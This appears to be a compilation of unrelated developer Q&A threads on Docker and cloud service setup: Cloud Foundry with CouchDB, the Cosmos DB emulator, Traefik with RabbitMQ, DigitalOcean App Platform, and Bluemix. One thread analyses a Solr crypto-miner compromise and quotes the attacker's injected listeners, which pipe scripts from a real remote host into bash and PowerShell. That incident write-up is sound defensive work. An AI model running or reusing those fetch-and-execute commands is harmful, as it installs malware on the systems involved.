I am reviewing the Cloud Foundry project and trying to install it on a server.
I want to use CouchDB as the database service.
My main question is: how do I use CouchDB in Cloud Foundry?
I installed a CF instance with: vcap_dev_setup -c devbox_all.yml -D mydomain.com
The devbox_all.yml contains:
install:
  - all
In this install, the couchdb_node and couchdb_gateway are present by default.
But it seems to be buggy in general.
For example, when I delete an app I get this error:
$ vmc delete notes2
Provisioned service [mongodb-d216a] detected, would you like to delete it? [yN]: y
Provisioned service [redis-8fcdc] detected, would you like to delete it? [yN]: y
Deleting application [notes2]: OK
Deleting service [mongodb-d216a]: Error 503: Unexpected response from service gateway
So I tried to install a CF instance with this config
(a standard single node with Redis, CouchDB and MongoDB).
conf.yml:
jobs:
  install:
    - nats_server
    - router
    - stager
    - ccdb
    - cloud_controller:
        builtin_services:
          - redis
          - mongodb
          - couchdb
    - health_manager
    - dea
    - uaa
    - uaadb
    - redis_node:
        index: "0"
    - couchdb_node:
        index: "0"
    - mongodb_node:
        index: "0"
    - coudb_gateway
    - redis_gateway
    - mongodb_gateway
First, this config doesn't work, because 'couchdb' is not a valid keyword in the builtin_services part.
So, what am I doing wrong?
Is CouchDB integration still a work in progress that wasn't finished as of last week?
Next, I managed to install the CF instance without the couchdb builtin_services option, but with a couchdb_node and a couchdb_gateway, and they start.
I suppose the service is runnable.
But I can't use 'couchdb' in my app's manifest.yml or choose this service to bind to.
(That seems normal, because it isn't installed as a service.)
So it seems close to working, but it's not.
I'm asking for ideas and advice here because I couldn't find anyone discussing this around the web.
Thanks for reading.
Lucas
I decided to try this myself and it appears to work OK. I created a new VCAP instance with vcap_dev_setup and the following configuration:
---
deployment:
  name: "cloudfoundry"
jobs:
  install:
    - nats_server
    - cloud_controller:
        builtin_services:
          - mysql
          - postgresql
          - couchdb
    - stager
    - router
    - health_manager
    - uaa
    - uaadb
    - ccdb
    - dea
    - couchdb_gateway
    - couchdb_node:
        index: "0"
    - postgresql_gateway
    - postgresql_node:
        index: "0"
    - mysql_gateway
    - mysql_node:
        index: "0"
I was able to bind instances of CouchDB to a Node.js app and read the service info from VCAP_SERVICES, as below:
'{"couchdb-1.2":[{"name":"couchdb-c7eb","label":"couchdb-1.2","plan":"free","tags":["key-value","cache","couchdb-1.2","couchdb"],"credentials":{"hostname":"127.0.0.1","host":"127.0.0.1","port":5984,"username":"7f3c0567-89cc-4240-b249-40d1f4586035","password":"8fef9e88-3df2-46a8-a22c-db02b2917251","name":"dde98c69f-01e9-4e97-b0d6-43bed946da95"}}]}'
I was also able to tunnel the service to a local port and connect to it.
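For reference, the tunnelling step was roughly this (a sketch from memory; the service name comes from the VCAP_SERVICES output above, and the local port is whatever vmc prints, typically 10000):

$ vmc tunnel couchdb-c7eb
$ curl http://TUNNEL_USER:TUNNEL_PASS@localhost:10000/_all_dbs

where TUNNEL_USER and TUNNEL_PASS stand for the credentials vmc displays when the tunnel opens.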
What version of Ubuntu have you used to install VCAP?
I have been battling this for a while now.
Scenario
We are using the Cosmos SQL API and Cosmos Graph (Gremlin) in our project. For a long time we have been forced to use Azure resources when developing against the graph databases.
I wish to get rid of this for the local development environment (LDE) and run the Azure Cosmos DB emulator in Docker using the mcr.microsoft.com/cosmosdb/windows/azure-cosmos-emulator:latest image. The reason for Docker is that we have some weird policies forced upon us by corporate IT, which made it impossible to get the Azure Cosmos DB Emulator to work properly even for the SQL API. The SQL API works fine with the Docker image, and I'm running Docker Compose.
After some investigation I found that the image is actually not looking for environment variables like AZURE_COSMOS_EMULATOR_GREMLIN_ENDPOINT:true. This was after investigating C:/CosmosDB.Emulator/Start.ps1 in the container. So I figured I could fix this by simply replacing the Start.ps1 in the container, stopping it, and committing it as a new image.
Which worked! Then I created a script to replicate the manual steps so my team doesn't have to repeat the procedure. But now it's not working: the SQL API and Azure Cosmos DB Explorer work perfectly, but I cannot connect with Gremlin over port 8901, which worked earlier, at least once.
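The replication script boils down to something like this (a sketch, not the exact file; container and image names match my compose file below):

# stop the emulator container first - docker cp into a running
# Windows container can fail
docker stop azurecosmosemulator-sqlapi
# overwrite the startup script with the patched copy
docker cp ./Start.ps1 azurecosmosemulator-sqlapi:'C:\CosmosDB.Emulator\Start.ps1'
# freeze the patched container as a new image
docker commit azurecosmosemulator-sqlapi customimagename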
I have confirmed that the Start-CosmosDbEmulator command executed during start of the container has the -EnableGremlin flag set. But no luck; I just get:
Unable to connect to the remote server ---> System.Net.Http.HttpRequestException: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond. ---> System.Net.Sockets.SocketException: A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond..
Has anyone got these two to work together? I can't figure out what the issue is.
This is what I tried / have done:
Certificates are imported and https://localhost:8081/_explorer/index.html is trusted.
The port setup in the docker-compose file is standard.
I have tried to start the container with docker run; no luck.
I'm 100% sure that the start-up command runs with -EnableGremlin set, based on the transcript log file and on investigating the Start.ps1 file in the container.
The computemachine.config in the container has "IsGremlinEndpointEnabled":true for the ContainerAdministrator user.
I connect over localhost:8901 with the standard key, and the database and container/collection are created.
Querying with the SQL API works fine.
Note: the single time I got it to work, it also worked fine together with the Gremlin API functionality.
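If it helps to narrow this down, one can check whether anything is listening on 8901 inside the container at all, versus the compose port mapping being the problem (my own diagnostic idea, not from any docs; container name as in my compose file below):

# inside the container: is the Gremlin port bound?
docker exec azurecosmosemulator-sqlapi powershell -Command "netstat -ano | Select-String 8901"

# from the Windows host: is the mapped port reachable?
powershell -Command "Test-NetConnection -ComputerName localhost -Port 8901"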
Docker Compose
version: '2.4' # Do not upgrade to 3.x yet, unless you plan to use swarm/docker stack: https://github.com/docker/compose/issues/4513
networks:
  default:
    external: false
    ipam:
      driver: default
      config:
        - subnet: "172.16.238.0/24"
services:
  cosmosdb:
    container_name: "azurecosmosemulator-sqlapi"
    hostname: "azurecosmosemulator-sqlapi"
    image: 'customimagename'
    platform: windows
    tty: true
    restart: always
    mem_limit: 3GB
    ports:
      - '8081:8081'
      - '8900:8900'
      - '8901:8901'
      - '8902:8902'
      - '10250:10250'
      - '10251:10251'
      - '10252:10252'
      - '10253:10253'
      - '10254:10254'
      - '10255:10255'
      - '10256:10256'
      - '10350:10350'
    environment:
      - AZURE_COSMOS_EMULATOR_PARTITION_COUNT=10
      - AZURE_COSMOS_EMULATOR_ENABLE_DATA_PERSISTENCE=true
      - AZURE_COSMOS_EMULATOR_GREMLIN_ENDPOINT=true
    networks:
      default:
        ipv4_address: 172.16.238.246
    volumes:
      - '${hostDirectoryCosmosDBSQLAPI}:C:\CosmosDB.Emulator\bind-mount'
I have left in the environment variables that don't seem to have any purpose at all, but I have also tried removing them several times in case they had any effect in code inside the container that I cannot, or have not yet, investigated.
The transcript log
**********************
Windows PowerShell transcript start
Start time: 20220204162955
Username: User Manager\ContainerAdministrator
RunAs User: User Manager\ContainerAdministrator
Machine: AZURECOSMOSEMUL (Microsoft Windows NT 10.0.14393.0)
Host Application: powershell.exe -NoExit -NoLogo -Command C:\CosmosDB.Emulator\Start.ps1
Process ID: 1868
PSVersion: 5.1.14393.4583
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.4583
BuildVersion: 10.0.14393.4583
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
Transcript started, output file is C:\CosmosDB.Emulator\bind-mount\Diagnostics\Transcript.log
INFO: Stop-CosmosDbEmulator
INFO: Start-CosmosDbEmulator -AllowNetworkAccess -NoFirewall -NoUI -Key C2y6yDjf5/R+ob0N8A7Cgv30VRDJIWEHLM+4QDU5DE2nQ9nDuVTqobD4b8mGGyPMbIZnqyMsEcaGQy67XIw/Jw== -Consistency Session -Timeout 300 -EnableGremlin
Directory: C:\CosmosDB.Emulator\bind-mount
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/4/2022 4:30 PM 804 CosmosDbEmulatorCert.cer
Key : GremlinEndpoint
Value : {http://azurecosmosemulator-sqlapi:8901/, http://172.16.238.246:8901/}
Name : GremlinEndpoint
Key : TableEndpoint
Value : {https://azurecosmosemulator-sqlapi:8902/, https://172.16.238.246:8902/}
Name : TableEndpoint
Key : Key
Value : C2y6yDjf5/R+ob0N8A7Cgv30VRDJIWEHLM+4QDU5DE2nQ9nDuVTqobD4b8mGGyPMbIZnqyMsEcaGQy67XIw/Jw==
Name : Key
Key : Version
Value : 2.14.5.0
Name : Version
Key : IPAddress
Value : 172.16.238.246
Name : IPAddress
Key : Emulator
Value : CosmosDB.Emulator
Name : Emulator
Key : CassandraEndpoint
Value : {tcp://azurecosmosemulator-sqlapi:10350/, tcp://172.16.238.246:10350/}
Name : CassandraEndpoint
Key : MongoDBEndpoint
Value : {mongodb://azurecosmosemulator-sqlapi:10255/, mongodb://172.16.238.246:10255/}
Name : MongoDBEndpoint
Key : Endpoint
Value : {https://azurecosmosemulator-sqlapi:8081/, https://172.16.238.246:8081/}
Name : Endpoint
I hope there is someone out there who can point me in the right direction.
Maybe the solution is to skip this entirely and live with the fact that I have to create collections in Azure and work against those for the graph databases.
Grateful for any advice.
I'm currently working on a project where I have a virtual machine on Microsoft Azure, and I'm trying to make multiple Docker containers accessible through different routes with the help of a Traefik reverse proxy. Besides the reverse proxy, the first service I need is RabbitMQ, and I should be able to access its user interface on a /rmq route. Right now, I have the following docker-compose file to build both services:
version: "3.5"
services:
rabbitmq:
image: rabbitmq:3-alpine
expose:
- 5672
- 15672
volumes:
- ./rabbit/enabled_plugins:/etc/rabbitmq/enabled_plugins
labels:
- traefik.enable=true
- traefik.http.routers.rabbitmq.rule=Host(`HOST.com`) && PathPrefix(`/rmq`)
# needed, when you do not have a route "/rmq" inside your container (according to https://stackoverflow.com/questions/59054551/how-to-map-specific-port-inside-docker-container-when-using-traefik)
- traefik.http.routers.rabbitmq.middlewares=strip-docs
- traefik.http.middlewares.strip-docs.stripprefix.prefixes=/rmq
- traefik.port=15672
networks:
- proxynet
traefik:
image: traefik:2.1
command: --api=true # Enables the web UI
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
- ./traefik/traefik.toml:/etc/traefik/traefik.toml:ro
ports:
- 80:80
- 443:443
labels:
traefik.enable: true
traefik.http.routers.traefik.rule: "Host(`HOST.com`)"
traefik.http.routers.traefik.service: "api#internal"
networks:
- proxynet
And this is the content of my traefik.toml file:
logLevel = "DEBUG"
debug = true
[api]
dashboard = true
insecure = false
debug = true
[providers.docker]
endpoint = "unix:///var/run/docker.sock"
watch = true
[entryPoints]
[entryPoints.web]
address = ":80"
[entryPoints.web-secure]
address = ":443"
[log]
level = "DEBUG"
format = "json"
The enabled_plugins file specifies which RabbitMQ plugins should be activated. Here, I have the rabbitmq_management plugin (among others), which I think is needed to access the RabbitMQ UI. I even checked the logs of the RabbitMQ container, and apparently rabbitmq_management was properly started:
rabbitmq_1 | 2021-01-30 15:50:30.538 [info] <0.730.0> Server startup complete; 7 plugins started.
rabbitmq_1 | * rabbitmq_stomp
rabbitmq_1 | * rabbitmq_federation_management
rabbitmq_1 | * rabbitmq_mqtt
rabbitmq_1 | * rabbitmq_federation
rabbitmq_1 | * rabbitmq_management
rabbitmq_1 | * rabbitmq_web_dispatch
rabbitmq_1 | * rabbitmq_management_agent
rabbitmq_1 | completed with 7 plugins.
rabbitmq_1 | 2021-01-30 15:50:30.539 [info] <0.730.0> Resetting node maintenance status
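For reference, my enabled_plugins file is essentially this (recreated here via a heredoc; Erlang term syntax, note the trailing dot; dependency plugins such as rabbitmq_web_dispatch and rabbitmq_management_agent are started automatically):

cat > rabbit/enabled_plugins <<'EOF'
[rabbitmq_management,rabbitmq_federation,rabbitmq_federation_management,rabbitmq_stomp,rabbitmq_mqtt].
EOF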
With these configurations running via docker-compose up, if I try to access HOST.com/rmq, I get a 502 (Bad Gateway) error in my browser's console, and initially this was where I was stuck. However, after searching for help online, I found a different way to specify the Traefik port in the RabbitMQ container labels (traefik.http.services.rabbitmq.loadbalancer.server.port=15672). With this modification I no longer get the Bad Gateway error, but I get a lot of ERR_ABORTED 404 (Not Found) errors in my browser's console (the list below does not contain all the errors):
rmq:7 GET http://HOST.com/js/ejs-1.0.min.js net::ERR_ABORTED 404 (Not Found)
rmq:18 GET http://HOST.com/js/charts.js net::ERR_ABORTED 404 (Not Found)
rmq:19 GET http://HOST.com/js/singular/singular.js net::ERR_ABORTED 404 (Not Found)
Refused to apply style from 'http://HOST.com/css/main.css' because its MIME type ('text/plain') is not a supported stylesheet MIME type, and strict MIME checking is enabled.
rmq:27 Uncaught ReferenceError: sync_get is not defined at rmq:27
I don't have much experience with this kind of project, and I don't know if I'm doing something wrong or if something is missing in these configurations or in the configuration of the virtual machine itself. Do you know what I should do to be able to access the RabbitMQ UI at HOST.com/rmq?
If I get this running properly, I think I would also be able to configure Docker to only allow access to the Traefik UI through a route such as HOST.com/dashboard, instead of accessing it only via the bare URL without any route.
Thanks in advance!
Solved it. I don't know why, but when I added the configuration traefik.http.services.rabbitmq.loadbalancer.server.port=15672, I had changed the order of the lines traefik.http.routers.rabbitmq.middlewares=strip-docs and traefik.http.middlewares.strip-docs.stripprefix.prefixes=/rmq, making the prefix definition appear before the middleware. I changed that back, and now I can access the RabbitMQ UI at HOST.com/rmq. So my final docker-compose file is this:
version: "3.5"
services:
rabbitmq:
image: rabbitmq:3-alpine
expose:
- 5672
- 15672
volumes:
- ./rabbit/enabled_plugins:/etc/rabbitmq/enabled_plugins
labels:
- traefik.enable=true
- traefik.http.routers.rabbitmq.rule=Host(`HOST.com`) && PathPrefix(`/rmq`)
# needed, when you do not have a route "/rmq" inside your container (according to https://stackoverflow.com/questions/59054551/how-to-map-specific-port-inside-docker-container-when-using-traefik)
- traefik.http.routers.rabbitmq.middlewares=strip-docs
- traefik.http.middlewares.strip-docs.stripprefix.prefixes=/rmq
- traefik.http.services.rabbitmq.loadbalancer.server.port=15672
networks:
- proxynet
traefik:
image: traefik:2.1
command: --api=true # Enables the web UI
volumes:
- /var/run/docker.sock:/var/run/docker.sock:ro
- ./traefik/traefik.toml:/etc/traefik/traefik.toml:ro
ports:
- 80:80
- 443:443
labels:
traefik.enable: true
traefik.http.routers.traefik.rule: "Host(`HOST.com`)"
traefik.http.routers.traefik.service: "api#internal"
networks:
- proxynet
I'll mark this question as solved, but if you know why the order of these 2 lines matters, please explain for future reference.
Thanks!
Trace of how I determined an answer to suggest for this question, given that I haven't used the specific tools:
By searching for rabbitmq admin url, I found the RabbitMQ management docs page, which, near the top, mentions support for a path prefix setting. I searched the page for that, and under the relevant heading found that you will likely need to set this in your RabbitMQ config:
management.path_prefix = /rmq
So, to apply it to your Docker config, I looked up the rabbitmq Docker image, whose docs explain that configuration files need to be injected via a bind mount, or can be provided via an esoteric Erlang config mechanism which I'd personally not mess with. Therefore, the steps I'd follow from here would be:
look in the existing rabbitmq image to find out what the default config file at /etc/rabbitmq/rabbitmq.conf contains, e.g. by running docker-compose run rabbitmq cat /etc/rabbitmq/rabbitmq.conf, or with an appropriate docker cp command if it turns out rabbitmq sets a Docker ENTRYPOINT which prevents use of shell commands on the image command line
add a volume just like you have for enabled_plugins, but one directory up, mapping rabbit/ to /etc/rabbitmq/, and put the default config from the container in rabbit/
add that line to the config file (see the sketch after this list)
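Concretely, those three steps might look like this (an untested sketch, assuming the image does ship a default /etc/rabbitmq/rabbitmq.conf):

# 1. pull the default config out of the image (entrypoint permitting)
docker-compose run --rm rabbitmq cat /etc/rabbitmq/rabbitmq.conf > rabbit/rabbitmq.conf

# 2. append the path prefix setting from the management docs
echo "management.path_prefix = /rmq" >> rabbit/rabbitmq.conf

# 3. then widen the bind mount in docker-compose.yml from the single
#    enabled_plugins file to the whole directory:
#      volumes:
#        - ./rabbit:/etc/rabbitmq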
With any luck that should at least get you closer. I'm curious to hear how it goes!
By the way, while looking at the rabbitmq Docker image docs, I discovered that there are special tags for management interface support. You may find that you need to switch to one of those instead of plain 3-alpine for this to work, e.g. rabbitmq:3-management-alpine.
I've created a YAML spec for my DO App Platform app, based on the sample in this repository.
The reason I couldn't simply use the UI on the DigitalOcean website is that my project is a monorepo.
The spec looks like this:
name: unique-expressions
services:
  - name: api
    environment_slug: node-js
    github:
      repo: Valencian-Digital/unique-expressions
      branch: main
      deploy_on_push: true
    source_dir: api
    routes:
      - path: /api
But when I try to execute
doctl apps create --spec .do/app.yaml
It returns a 500 error and nothing else. I've tried executing the command both in a GitHub Action and locally with different API tokens.
I'm able to access other resources on my DO account, but I can't successfully create the app from the spec.
This is the specific error I get back from doctl:
Error: POST https://api.digitalocean.com/v2/apps: 500 Server Error
Do y'all know what could be going wrong?
So I discovered what was going wrong: essentially, the branch name was wrong (I put main instead of master).
You can find more info here: https://github.com/digitalocean/doctl/issues/883.
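A quick sanity check that would have caught this is to list the branches that actually exist on the repo before deploying:

$ git ls-remote --heads https://github.com/Valencian-Digital/unique-expressions.git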
TLDR - this is the right config:
name: unique-expressions
services:
  - name: api
    environment_slug: node-js
    github:
      repo: Valencian-Digital/unique-expressions
      branch: master
      deploy_on_push: true
    source_dir: api
    routes:
      - path: /api
Prehistory:
My friend's site started to work slowly.
This site uses Docker.
htop showed that all cores were loaded at 100% by the process /var/tmp/sustes running as user 8983. I tried to find out what sustes is, but Google did not help; however, UID 8983 suggested the problem was in the Solr container.
I tried to update Solr from v6.x to 7.4 and got this message:
o.a.s.c.SolrCore Error while closing
...
Caused by: org.apache.solr.common.SolrException: Error loading class
'solr.RunExecutableListener'
I rolled back to v6.6.4 (the only v6 available on Docker Hub: https://hub.docker.com/_/solr/), as the site had to keep working.
In the Docker logs I found:
[x:default] o.a.s.c.S.SolrConfigHandler Executed config commands successfully and persited to File System [{"update-listener":{
    "exe":"sh",
    "name":"newlistener-02",
    "args":["-c",
      "curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
    "event":"newSearcher",
    "class":"solr.RunExecutableListener",
    "dir":"/bin/"}}]
So at http://192.99.142.226:8220/mr.sh we can find the malware code, which installs a crypto miner (the miner's config is at http://192.99.142.226:8220/wt.conf).
Using the link http://example.com:8983/solr/YOUR_CORE_NAME/config we can see the full config, but right now we need just the listener section:
"listener":[{
"event":"newSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"event":"firstSearcher",
"class":"solr.QuerySenderListener",
"queries":[]},
{
"exe":"sh",
"name":"newlistener-02",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"sh",
"name":"newlistener-25",
"args":["-c",
"curl -s http://192.99.142.226:8220/mr.sh | bash -sh"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"/bin/"},
{
"exe":"cmd.exe",
"name":"newlistener-00",
"args":["/c",
"powershell IEX (New-Object Net.WebClient).DownloadString('http://192.99.142.248:8220/1.ps1')"],
"event":"newSearcher",
"class":"solr.RunExecutableListener",
"dir":"cmd.exe"}],
As we do not have such settings in solrconfig.xml, I found them in /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json (the settings from this file can also be viewed at http://example.com:8983/solr/YOUR_CORE_NAME/config/overlay).
Fixing:
Clean configoverlay.json, or simply remove the file (rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json).
Restart Solr (how to start/stop: https://lucene.apache.org/solr/guide/6_6/running-solr.html#RunningSolr-StarttheServer) or restart the Docker container.
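If Solr runs in Docker (container name as in the compose file below), both steps can be done from the host:

docker exec solr-container rm /opt/solr/server/solr/mycores/YOUR_CORE_NAME/conf/configoverlay.json
docker restart solr-container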
As I understand it, this attack is possible due to CVE-2017-12629:
How to Attack Apache Solr By Using CVE-2017-12629 - https://spz.io/2018/01/26/attack-apache-solr-using-cve-2017-12629/
CVE-2017-12629: Remove RunExecutableListener from Solr - https://issues.apache.org/jira/browse/SOLR-11482?attachmentOrder=asc
... and is fixed in v5.5.5, 6.6.2+, and 7.1+.
The attack also relies on http://example.com:8983 being freely available to anyone, so even though this exploit is fixed, let's...
Add protection to http://example.com:8983
Based on https://lucene.apache.org/solr/guide/6_6/basic-authentication-plugin.html#basic-authentication-plugin
Create security.json with:
{
  "authentication":{
    "blockUnknown": true,
    "class":"solr.BasicAuthPlugin",
    "credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c="}
  },
  "authorization":{
    "class":"solr.RuleBasedAuthorizationPlugin",
    "permissions":[{"name":"security-edit",
      "role":"admin"}],
    "user-role":{"solr":"admin"}
  }
}
This file must be dropped into /opt/solr/server/solr/ (i.e. next to solr.xml).
As Solr has its own hash checker (a sha256(password+salt) hash), a typical solution cannot be used here. The easiest way I've found to generate the hash is to download the jar file from http://www.planetcobalt.net/sdb/solr_password_hash.shtml (at the end of the article) and run it as java -jar SolrPasswordHash.jar NewPassword.
Because I use docker-compose, I simply build Solr like this:
# project/dockerfiles/solr/Dockerfile
FROM solr:7.4
ADD security.json /opt/solr/server/solr/

# project/sources/docker-compose.yml (just the Solr part)
solr:
  build: ./dockerfiles/solr/
  container_name: solr-container
  # Check if the 'default' core is created. If not, create it.
  entrypoint:
    - docker-entrypoint.sh
    - solr-precreate
    - default
  # Access to the web interface from host to container, i.e. 127.0.0.1:8983
  ports:
    - "8983:8983"
  volumes:
    - ./dockerfiles/solr/default:/opt/solr/server/solr/mycores/default # configs
    - ../data/solr/default/data:/opt/solr/server/solr/mycores/default/data # indexes
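A quick way to verify the protection took effect (a sketch using the precreated default core, and assuming you replaced the example hash with one generated for NewPassword): an anonymous request should now be rejected, while an authenticated one succeeds.

$ curl -i 'http://127.0.0.1:8983/solr/default/select?q=*:*'                      # expect 401
$ curl -i -u solr:NewPassword 'http://127.0.0.1:8983/solr/default/select?q=*:*'  # expect 200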
I'm trying to follow the tutorial noted below:
http://www.ibm.com/developerworks/cloud/library/cl-bluemix-nodejs-app/
But when I push my app, I see the following:
Using manifest file /mytests/bluemix-node-mysql-upload/manifest.yml
Updating app jea-node-mysql-upload in org jea68@gmail.com / space dev as jea68@gmail.com...
OK
Uploading jea-node-mysql-upload...
Uploading app files from: /mytests/bluemix-node-mysql-upload/app
Uploading 53.6K, 11 files
Done uploading
OK
FAILED
Could not find service mysql-database to bind to jea-node-mysql-upload
Is there a problem with the node.js buildpack or is the documentation faulty?
I've been able to push Node.js apps without any problems this morning. The documentation assumes the user knows that the service has already been created. The manifest.yml included in the tutorial's GitHub repo defines a service (mysql-database) that has not been created. Run the following command to create the service:
$ cf create-service mysql 100 jea-mysql-node-upload-service
Then modify the manifest.yml to include:
services:
- jea-mysql-node-upload-service
Alternatively, since you already have an app, you can bind the application to the service by running the following:
$ cf bind-service jea-node-mysql-upload jea-mysql-node-upload-service
$ cf start jea-node-mysql-upload
It looks like a fault in the documentation. If you look at Step 2 part 3, it says to create the MySQL service using this command:
cf create-service mysql 100 mysql-node-upload
which names the service instance mysql-node-upload. However, the manifest.yml file that you cloned from GitHub contains the service name mysql-database. It is the manifest.yml file that links the app with the service instance.
The options are either to change the manifest.yml file to use the correct name of your MySQL service instance, or to recreate the MySQL service instance with the name that is in your manifest.yml.
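For the first option, the relevant part of manifest.yml would look something like this (app name as in your push output, service instance name as created in Step 2):

applications:
  - name: jea-node-mysql-upload
    services:
      - mysql-node-upload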